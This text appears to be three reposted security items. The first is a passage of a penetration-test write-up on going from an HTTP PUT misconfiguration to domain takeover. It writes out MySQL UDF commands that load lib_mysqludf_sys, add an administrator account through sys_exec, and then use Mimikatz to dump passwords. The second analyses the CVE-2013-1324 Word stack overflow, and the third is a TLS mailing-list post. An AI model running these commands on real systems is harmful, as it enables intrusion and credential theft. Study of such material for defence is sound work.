“lib_mysqludf_sys”available on https://github.com/mysqludf comes in handy. The “lib_mysqludf_sys”library has functions to interact with the operating system. These functions allow you to interact with the execution environment in which MySQL runs. This library is available with SQLMAP (udf/mysql) Firstly, we copied the library on to the target machine in a known location using the PUT method. We had to write this file to “c:\windows\system32”directory. But our web server was running with limited privileges. While logging in we face another issue, the root user is not allowed to login remotely on the MySQL database. This was easy to overcome!We wrote a php file which allowed our IP address to login remotely on the MySQL server and executed it using the same steps that we have been doing so far. Next, we logged in and triggered a SQL query to load this file in to a newly created table row. Here, we are instructing MySQL to create a new function to point to the code in our malicious library. Finally, we executed this new function with arbitrary system commands that we wish to run. The commands used are shown below: USE mysql; CREATE TABLE npn(line blob); INSERT INTO npn values(load_files('C://root//lib_mysqludf_sys.dll')); SELECT * FROM mysql.npn INTODUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll'; CREATE FUNCTION sys_exec RETURNSintegerSONAME 'lib_mysqludf_sys_32.dll'; SELECT sys_exec("net user omair NIIConsult!n4 /add"); SELECT sys_exec("net localgroup Administrators omair /add"); As seen a user omair with administrative privileges was added to the server. Further, we logged in to the server through remote desktop. Time to escalate our privileges even further!At this stage, we were local administrator and did not have a domain account. We found multiple users logged in to the system. At this point we want to dump the passwords from the memory of that system. Mimikatz helps you do that. What is Mimikatz? Mimikatz is a slick tool that pulls plain-text passwords out of WDigest interfaced through LSASS. Read here to know more about how to use different features in Mimikatz We then uploaded “mimikatz.exe”on the server using our account omair. It was likely that the antivirus on the server would flag it. In our case it did not. Even if it did we could use various evasion techniques to upload and execute the file. We then used our favourite widgest method to retrieve passwords in clear text and get credentials for a user “taufiq” who was an ordinary Domain User but also had Admin privileges on some product related servers. Now we logged into all these product related servers with the account we had to search for more interesting accounts which we could escalate our privileges to. We were able to find several accounts but the most authoritative account was of course the Domain Admin. That’s it, we again uploaded mimiktaz on this system and obtained password for the Domain Admin account. Net result was that the Domain was 0wned! From here on we could use smbexec utility to extract domain hashes from the domain controller. Conclusion: This article shows how a simple vulnerability like enabling HTTP verbs such as PUT and MOVE can serve as the doorway to a far more insidious attack and allow the attacker to take complete ownership of the network. Of course, there were a large number of other vulnerabilities that allowed us to do this – but the entry point was simply one mis-configured HTTP server! Author: Omair Sursa: Owning The Enterprise With HTTP PUT - Checkmate

CVE-2013-1324 Microsoft Office WPD File Remote Memory Corruption Vulnerability Author: Ling Chuan Lee Vulnerable: Microsoft Office Word 2007 (12.0.4518.1014) MSO (12.0.4518.1014) Tested Platform: Windows 7 Professional WordPerfect 5 converter module used by Microsoft Office Word was vulnerable to stack buffer overflow when process a special crafted WordPerfect document with an invalid number of CSTYL border elements. In order to understand what is going on, we need to understand the file format has been used by Word Perfect. You could get a copy of Word Perfect file format from here WP6 File Format SDK In WP5.x documents, the file header is 16 bytes long. Next is the file prefix in blocks of five indexes with their relative data following each index block. F13 Research Labs identified the vulnerable WP records in variable-length multi-byte function 0xDC. The codes for variable length multi byte functions [208 (0xD0) through 239 (0xEF)] appear twice each time the function is invoked. The first occurence is the 'open gate' and the second is the 'closing gate'. Each 'open gate' is followed by a subgroup byte, a value of size short (16 bits) and a function flags byte. If the flags indicates there is prefix data associated with the function, a number of prefix ID bytes come next, followed by the prefix index-ID words. Next is a word (16 bits) showing the size of the non-deleteable information. Following the deletable data are a size word and the 'closing gate' [1]. Here is a picture representation of the generic WordPerfect 5.x File Structure: Figure 1: WordPerfect 5.x File Structure CVE-2013-1324 vulnerability is a classic stack buffer overflow that occurs when WordPerfect 5 converter module 'WPFT532.CNV' processing crafted WordPerfect file with the unusual value '0x00' and '0xAC'. Figure 2: Malformed Multi-byte Function 0xDC Figure 3: Malformed Multi-byte Function 0xDC When we looked into the execution flow, we noticed that the code at address '0x014D9315' (and eax, 7FFFh) is the instruction caused the value of total number of the loop (eax) which is writing bytes into a stack become '0x2C00'. Figure 4: The Invalid Value 0x2C00 .text:014D931A mov [ebp+var_4], eax ;[ebp-4]=0000 2c00 .text:014D931D xor eax, eax ;eax=0 .text:014D931F mov ah, [esi+1] ;ah=00 .text:014D9322 mov al, [esi] ;al=00 ...... ...... .text:014D9315 and eax, 7FFFh ;eax=0000 ac00&7FFFh=0000 2c00 As you can see from the figure below, the 'loc_14D9336' is a loop calling the function 'sub_14D89A4' which is writing bytes into a stack-defined variable with a fixed size. For each loop, the total number of the loop ([ebp+var_4]) will increase '0xFFFF' until it is equal to zero and edi represents current index from the process. This code is inside a loop and as the loop goes on, the index value will increase. The result of bounds check doesn't happen, Stack Base Pointer Register (EBP) will be overwritted in function 'sub_14D89A4' after the index of the loop (edi) hit 0x20, which leads to stack buffer overflow. Figure 4: Writing Bytes into a Stack-defined Variable with a Fixed Size Figure 5 shows the code where the overwrite of Stack Base Pointer Register (EBP) happens. As shown below, the value of '0x6a0' is the total size to write. If the user have a larger value, this WordPerfect document file may trigger the stack buffer overflow by overwriting the buffer with a bigger number. .text:014D89A4 push ebp .text:014D89A5 mov ebp, esp .text:014D89A7 push ebx .text:014D89A8 push esi .text:014D89A9 mov esi, eax ;esi=eax=0x20 counter 0x20 .text:014D89AB imul eax, 14h ;eax=20h*14h=280 .text:014D89AE imul esi, 35h ;esi=0x20*0x35=0x6a0 maximum sizeof(CSTYL)*32 .text:014D89B1 add esi, [ebp+arg_0] ;esi=6a0+0018 f200=0018 f8a0 .text:014D89B4 add eax, offset word_14E4567 ;eax=280+offset WPFT532!AbortRtfToForeign+0x12684=6a52 47e7 .text:014D89B9 push edi ;edi=20 .text:014D89BA mov [ebp+arg_0], eax ;[ebp+8]=[0018 f1e8]=6a52 47e7 .text:014D89BD mov eax, [ebp+arg_4] ;eax=[ebp+0ch]= [0018 f1ec]=00 .text:014D89C0 xor ebx, ebx ;ebx=0 .text:014D89C2 push ebx .text:014D89C3 and eax, 7 ;eax=0 .text:014D89C6 push ebx ;ebx=0 .text:014D89C7 push eax ;eax=0 .text:014D89C8 lea eax, [esi+0Ch] ;eax=0018 f8ac, [esi+0ch]=[0018 f8ac]=0000 0000 .text:014D89CB push eax ;eax=0018 f8ac .text:014D89CC call sub_14D19F6 ;ebp no overwrite .text:014D89D1 mov eax, [ebp+arg_4] ;eax=[ebp+0ch]=[0018 f1ec]=0 .text:014D89D4 push ebx ;ebx=0 .text:014D89D5 shr eax, 3 ;eax=0 .text:014D89D8 push ebx ;ebx=0 .text:014D89D9 and eax, 7 ;eax=0 .text:014D89DC push eax .text:014D89DD push esi ;esi=0018 f8a0 .text:014D89DE call sub_14D19F6 ;ebp no overwrite .text:014D89E3 mov eax, [ebp+arg_4] ;eax=[ebp+0ch]=[0018 f1ec]=0 .text:014D89E6 push ebx ;ebx=0 .text:014D89E7 shr eax, 8 ;eax=0 .text:014D89EA push ebx ;ebx=0 .text:014D89EB and eax, 7 ;eax=0 .text:014D89EE push eax .text:014D89EF lea edi, [esi+24h] ;edi=0018 f8a0+24h=0018 f8c4, [esi+24h]=[0018f8a0+24h]=6a5082a7 .text:014D89F2 push edi ;edi=20 .text:014D89F3 call sub_14D19F6 ;overwrite ebp in this routine Figure below shown the overwrite of Stack Base Pointer Register (EBP 0x0018f8b8) in function 'sub_14D19F6' and caused the memory corruption Figure 6: EBP Before Overwrite Figure 7: EBP After Overwrite The result of the EBP overwrite will caused the Microsoft Office crash when return to the previous block code. Figure 8: Microsoft Office Crash Reference: 1. WP6 File Format SDK [Download] Sursa: F13 Laboratory

[h=1][TLS] Confirming Consensus on removing RSA key Transport from TLS 1.3[/h] The discussion on this list and others supports the consensus in IETF 89 to remove RSA key transport cipher suites from TLS 1.3. The Editor is requested to make the appropriate changes to the draft on github. More discussion is needed on both DH and ECDH are used going forward and on if standard DHE parameters will be specified. Joe [For the chairs] On Mar 26, 2014, at 11:43 AM, Joseph Salowey (jsalowey) <jsalowey at cisco.com> wrote: > TLS has had cipher suites based on RSA key transport (aka "static RSA", TLS_RSA_WITH_*) since the days of SSL 2.0. These cipher suites have several drawbacks including lack of PFS, pre-master secret contributed only by the client, and the general weakening of RSA over time. It would make the security analysis simpler to remove this option from TLS 1.3. RSA certificates would still be allowed, but the key establishment would be via DHE or ECDHE. The consensus in the room at IETF-89 was to remove RSA key transport from TLS 1.3. If you have concerns about this decision please respond on the TLS list by April 11, 2014. > > Thanks, > > Joe > [Speaking for the TLS chairs] > _______________________________________________ > TLS mailing list > TLS at ietf.org > https://www.ietf.org/mailman/listinfo/tls Sursa: Re: [TLS] Confirming Consensus on removing RSA key Transport from TLS 1.3